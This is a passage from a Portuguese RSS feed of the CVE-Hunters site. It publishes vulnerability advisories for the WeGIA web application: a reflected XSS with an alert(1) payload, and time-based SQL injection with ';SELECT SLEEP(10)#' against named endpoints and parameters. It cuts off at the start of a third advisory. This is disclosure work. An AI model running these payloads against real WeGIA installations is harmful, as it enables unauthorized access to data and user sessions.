&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53525&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53525&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;profile_familiar.php&amp;lt;/code&amp;gt; do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;GET /html/atendido/profile_familiar.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53525-cross-site-scripting-xss-refletido-no-endpoint-profile_familiarphp-parâmetro-id_dependente&amp;#34;&amp;gt;CVE-2025-53525: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;profile_familiar.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53525&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53525&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;profile_familiar.php&amp;lt;/code&amp;gt; do aplicativo WeGia. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;GET /html/atendido/profile_familiar.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;id_dependente&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;1&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53525/image.png&amp;#34;
	width=&amp;#34;719&amp;#34;
	height=&amp;#34;387&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53525/image_hu_3838ecfb5877b657.png 480w, /p/cve-2025-53525/image_hu_2be71b163f884c00.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;185&amp;#34;
		data-flex-basis=&amp;#34;445px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53525/image-1.png&amp;#34;
	width=&amp;#34;1071&amp;#34;
	height=&amp;#34;559&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53525/image-1_hu_5da17087cd8d939f.png 480w, /p/cve-2025-53525/image-1_hu_8abfd2784d7d0262.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;191&amp;#34;
		data-flex-basis=&amp;#34;459px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-982x-v58q-6qpj&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-982x-v58q-6qpj&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaborador&amp;#34;&amp;gt;Colaborador
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53527</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53527/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53527/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53527-vulnerabilidade-de-injeção-sql-nos-parâmetros-tipo-e-responsavel-do-endpoint-relatorio_geracaophp&amp;#34;&amp;gt;CVE-2025-53527: Vulnerabilidade de Injeção SQL nos parâmetros &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;responsavel&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;relatorio_geracao.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53527&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53527&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Injeção SQL foi identificada nos parâmetros &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;responsavel&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/controle/relatorio_geracao.php&amp;lt;/code&amp;gt;. Esta vulnerabilidade permite que invasores manipulem consultas SQL e acessem informações confidenciais do banco de dados, como nomes de tabelas e dados sensíveis.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/controle/relatorio_geracao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;responsavel&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;requisição-normal&amp;#34;&amp;gt;Requisição Normal:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53527/image.png&amp;#34;
	width=&amp;#34;1772&amp;#34;
	height=&amp;#34;846&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53527/image_hu_4ead4c411acbfc85.png 480w, /p/cve-2025-53527/image_hu_378d044d0498fc9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;209&amp;#34;
		data-flex-basis=&amp;#34;502px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53527-vulnerabilidade-de-injeção-sql-nos-parâmetros-tipo-e-responsavel-do-endpoint-relatorio_geracaophp&amp;#34;&amp;gt;CVE-2025-53527: Vulnerabilidade de Injeção SQL nos parâmetros &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;responsavel&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;relatorio_geracao.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53527&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53527&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Injeção SQL foi identificada nos parâmetros &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;responsavel&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/controle/relatorio_geracao.php&amp;lt;/code&amp;gt;. Esta vulnerabilidade permite que invasores manipulem consultas SQL e acessem informações confidenciais do banco de dados, como nomes de tabelas e dados sensíveis.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/controle/relatorio_geracao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;responsavel&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;requisição-normal&amp;#34;&amp;gt;Requisição Normal:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53527/image.png&amp;#34;
	width=&amp;#34;1772&amp;#34;
	height=&amp;#34;846&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53527/image_hu_4ead4c411acbfc85.png 480w, /p/cve-2025-53527/image_hu_378d044d0498fc9.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;209&amp;#34;
		data-flex-basis=&amp;#34;502px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;sql-injection-no-parâmetro-tipo&amp;#34;&amp;gt;SQL Injection no parâmetro &amp;lt;code&amp;gt;tipo&amp;lt;/code&amp;gt;
&amp;lt;/h3&amp;gt;&amp;lt;h4 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  ;SELECT SLEEP(10)#
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53527/image-1.png&amp;#34;
	width=&amp;#34;1772&amp;#34;
	height=&amp;#34;844&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53527/image-1_hu_c53ce822599b86e2.png 480w, /p/cve-2025-53527/image-1_hu_d3264b015af14a6d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;209&amp;#34;
		data-flex-basis=&amp;#34;503px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;sql-injection-no-parâmetro-responsavel&amp;#34;&amp;gt;SQL Injection no parâmetro &amp;lt;code&amp;gt;responsavel&amp;lt;/code&amp;gt;
&amp;lt;/h3&amp;gt;&amp;lt;h4 id=&amp;#34;payload-1&amp;#34;&amp;gt;Payload:
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  ;SELECT SLEEP(10)#
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53527/image-2.png&amp;#34;
	width=&amp;#34;1771&amp;#34;
	height=&amp;#34;848&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53527/image-2_hu_44bcaa97ca684007.png 480w, /p/cve-2025-53527/image-2_hu_5c23286a79e2c0ab.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;208&amp;#34;
		data-flex-basis=&amp;#34;501px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados sensíveis: Um invasor pode acessar informações confidenciais, como credenciais, dados pessoais ou financeiros.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento de contas de usuários: Usando credenciais roubadas, invasores podem obter acesso total ao aplicativo e executar ações em nome de usuários legítimos.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Exfiltração de dados: Possibilidade de roubo de grandes volumes de informações, despejando tabelas inteiras do banco de dados.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Danos à reputação: Expor dados de clientes ou informações comerciais pode prejudicar significativamente a Imagem da organização.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Execução de ataques em cadeia: As informações obtidas podem ser usadas para realizar novos ataques, como phishing direcionado ou ataques a sistemas interconectados.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-43xw-c4g6-jgff&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-43xw-c4g6-jgff&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53529</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53529/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53529/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53529-vulnerabilidade-de-injeção-sql-no-parâmetro-id_funcionario-do-endpoint-profile_funcionariophp&amp;#34;&amp;gt;CVE-2025-53529: Vulnerabilidade de Injeção SQL no parâmetro &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;profile_funcionario.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53529&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53529&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;html/funcionario/profile_funcionario.php&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro almox. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53529-vulnerabilidade-de-injeção-sql-no-parâmetro-id_funcionario-do-endpoint-profile_funcionariophp&amp;#34;&amp;gt;CVE-2025-53529: Vulnerabilidade de Injeção SQL no parâmetro &amp;lt;code&amp;gt;id_funcionario&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;profile_funcionario.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
